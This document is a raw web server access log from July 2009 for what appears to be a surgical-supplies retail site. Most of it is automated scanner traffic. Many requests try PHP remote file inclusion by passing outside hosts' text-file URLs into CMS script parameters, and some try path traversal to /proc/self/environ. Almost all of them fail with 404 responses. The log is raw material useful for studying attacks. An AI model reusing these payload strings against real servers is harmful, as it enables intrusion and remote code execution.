64.12.116.133 - - [16/Jul/2009:00:32:40 -0400] "GET /images/items/0500011_THUMB.JPG HTTP/1.1" 200 2145 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018C684E3B24C50008D100Z+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.1; AOLBuild 4334.5000; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
65.55.108.144 - - [16/Jul/2009:00:32:44 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/4.0"
65.55.108.144 - - [16/Jul/2009:00:32:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0"
121.78.116.209 - - [16/Jul/2009:00:33:37 -0400] "GET /logs/access_log.Q109061600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:00:33:37 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:00:33:37 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.79.47.122 - - [16/Jul/2009:00:33:57 -0400] "GET //?zb_path=http://www.eurostamp.com.ua/components/com_virtuemart/yuo.txt? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
220.79.47.122 - - [16/Jul/2009:00:33:57 -0400] "GET /logs//?zb_path=http://www.eurostamp.com.ua/components/com_virtuemart/yuo.txt? HTTP/1.1" 200 9731 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
121.78.116.209 - - [16/Jul/2009:00:34:05 -0400] "GET /logs/access_log.Q109071100//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:00:34:36 -0400] "GET /logs/access_log.Q109062300%20%20//bookmark4u/bo/include/print_category.php?setup[use_category]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:00:35:03 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
121.78.116.209 - - [16/Jul/2009:00:35:11 -0400] "GET /logs/access_log.Q109071100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:00:35:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.116.209 - - [16/Jul/2009:00:35:50 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/bo/include/print_category.php?setup[use_category]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
70.215.75.71 - - [16/Jul/2009:00:35:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
70.215.75.71 - - [16/Jul/2009:00:35:57 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
121.78.116.209 - - [16/Jul/2009:00:36:10 -0400] "GET /logs/access_log.Q109051400%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
218.246.20.221 - - [16/Jul/2009:00:36:50 -0400] "GET /logs//bookmark4u/bo/include/print_category.php?setup[use_category]=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
218.246.20.221 - - [16/Jul/2009:00:36:50 -0400] "GET //bookmark4u/bo/include/print_category.php?setup[use_category]=http://piffopuff.se/images/stories//test.txt??? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
70.215.75.71 - - [16/Jul/2009:00:36:54 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
121.78.116.209 - - [16/Jul/2009:00:37:00 -0400] "GET /logs/access_log.Q109070100%20%20//bookmark4u/bo/include/print_category.php?setup[use_category]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
70.215.75.71 - - [16/Jul/2009:00:37:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
121.78.116.209 - - [16/Jul/2009:00:37:51 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.otr.co.kr/bbs/files/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:00:38:29 -0400] "GET /logs//include/footer.php?_path[counter]=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:00:38:29 -0400] "GET //include/footer.php?_path[counter]=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
63.147.72.145 - - [16/Jul/2009:00:38:29 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://t0ys.altervista.org/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.249.68.70 - - [16/Jul/2009:00:39:04 -0400] "GET /images/items/suture_pga_full.jpg HTTP/1.1" 200 15370 "-" "Googlebot-Image/1.0"
74.223.143.131 - - [16/Jul/2009:00:39:26 -0400] "GET //ppa/inc/functions.inc.php?config[ppa_root_path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:00:39:26 -0400] "GET /logs/access_log.Q109053100%20%20//ppa/inc/functions.inc.php?config[ppa_root_path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:00:39:26 -0400] "GET /logs//ppa/inc/functions.inc.php?config[ppa_root_path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jul/2009:00:39:41 -0400] "GET /logs/access_log.Q109061600%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:00:39:43 -0400] "GET //ppa/inc/functions.inc.php?config[ppa_root_path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:00:39:43 -0400] "GET /logs/access_log.Q109053100%20%20//ppa/inc/functions.inc.php?config[ppa_root_path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:00:39:44 -0400] "GET /logs//ppa/inc/functions.inc.php?config[ppa_root_path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jul/2009:00:39:52 -0400] "GET /logs/access_log.Q109071100%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:39:58 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:39:58 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:40:02 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
76.91.104.169 - - [16/Jul/2009:00:40:32 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.91.104.169 - - [16/Jul/2009:00:40:32 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.91.104.169 - - [16/Jul/2009:00:40:33 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.91.104.169 - - [16/Jul/2009:00:40:33 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
84.201.208.50 - - [16/Jul/2009:00:40:40 -0400] "GET /logs/access_log.Q109051400%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:00:40:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.187.91.50 - - [16/Jul/2009:00:40:51 -0400] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.nakjimadang.com/ams/amboard/upload/bajocdm2?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
211.230.156.161 - - [16/Jul/2009:00:41:19 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:41:19 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:41:19 -0400] "GET /logs/access_log.Q109060700%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:41:51 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:41:51 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:41:51 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:41:51 -0400] "GET /logs/access_log.Q109051200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:42:00 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aboutav.com//id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:42:05 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
84.201.208.50 - - [16/Jul/2009:00:42:13 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.dracocafe.pl/sklep/components/com_sef/1.r?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:42:19 -0400] "GET /logs/access_log.Q109051200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:42:37 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:42:37 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:42:40 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:42:48 -0400] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:42:59 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:42:59 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:42:59 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:43:00 -0400] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:43:56 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:44:44 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:44:44 -0400] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:45:00 -0400] "GET /logs/access_log.Q109050700//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:45:00 -0400] "GET /logs/access_log.Q109051200//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jul/2009:00:45:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [16/Jul/2009:00:46:50 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:46:50 -0400] "GET /logs/access_log.Q109051200%20%20//admin/business_inc/saveserver.php?thisdir=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:00:47:00 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:00:47:01 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:00:47:01 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:00:47:20 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:00:47:20 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
219.85.63.226 - - [16/Jul/2009:00:47:20 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.bandbib.com/unix/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:47:33 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:47:34 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:47:39 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
204.30.3.225 - - [16/Jul/2009:00:47:40 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
24.23.112.96 - - [16/Jul/2009:00:47:59 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
24.23.112.96 - - [16/Jul/2009:00:47:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
24.23.112.96 - - [16/Jul/2009:00:48:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
24.23.112.96 - - [16/Jul/2009:00:48:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
211.230.156.161 - - [16/Jul/2009:00:48:35 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:48:35 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:48:35 -0400] "GET /logs/access_log.Q109052200//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.230.156.161 - - [16/Jul/2009:00:48:35 -0400] "GET /logs/access_log.Q109053100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:48:45 -0400] "GET //ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:48:45 -0400] "GET /logs//ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:48:45 -0400] "GET /logs/access_log.Q109053100%20%20//ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.223.143.131 - - [16/Jul/2009:00:48:45 -0400] "GET /logs/access_log.Q109053100//ppa/inc/functions.inc.php?config[ppa_root_path]=http://anansi.pl/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.202.4.158 - - [16/Jul/2009:00:48:46 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 244 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
91.202.4.158 - - [16/Jul/2009:00:48:46 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 239 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
91.202.4.158 - - [16/Jul/2009:00:48:46 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 266 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
91.202.4.158 - - [16/Jul/2009:00:48:46 -0400] "GET /errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
91.202.4.158 - - [16/Jul/2009:00:48:46 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
91.202.4.158 - - [16/Jul/2009:00:48:46 -0400] "GET /logs/errors.php?error=http://www.sohamsact.co.uk/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
91.202.4.158 - - [16/Jul/2009:00:48:46 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 266 "-" "XXXXXX"
91.202.4.158 - - [16/Jul/2009:00:48:46 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 244 "-" "XXXXXX"
91.202.4.158 - - [16/Jul/2009:00:48:46 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 239 "-" "XXXXXX"
91.202.4.158 - - [16/Jul/2009:00:48:47 -0400] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 244 "-" "XXXXXX"
91.202.4.158 - - [16/Jul/2009:00:48:47 -0400] "GET /logs/access_log.Q109052900/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 266 "-" "XXXXXX"
91.202.4.158 - - [16/Jul/2009:00:48:47 -0400] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 239 "-" "XXXXXX"
190.144.44.36 - - [16/Jul/2009:00:49:37 -0400] "GET /logs/access_log.Q109053100%20%20//ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:49:37 -0400] "GET /logs//ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
190.144.44.36 - - [16/Jul/2009:00:49:37 -0400] "GET //ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.23.158.226 - - [16/Jul/2009:00:50:47 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [16/Jul/2009:00:50:47 -0400] "GET /logs/access_log.Q109070500//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.23.158.226 - - [16/Jul/2009:00:50:47 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [16/Jul/2009:00:50:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [16/Jul/2009:00:50:50 -0400] "GET /logs/access_log.Q109062100//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
190.144.44.36 - - [16/Jul/2009:00:51:21 -0400] "GET /logs/access_log.Q109053100//ppa/inc/functions.inc.php?config[ppa_root_path]=http://www.robsonmartins.net/loja/admin/id.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:00:51:23 -0400] "GET ///index.php?option=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
124.0.139.129 - - [16/Jul/2009:00:51:23 -0400] "GET /logs///index.php?option=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
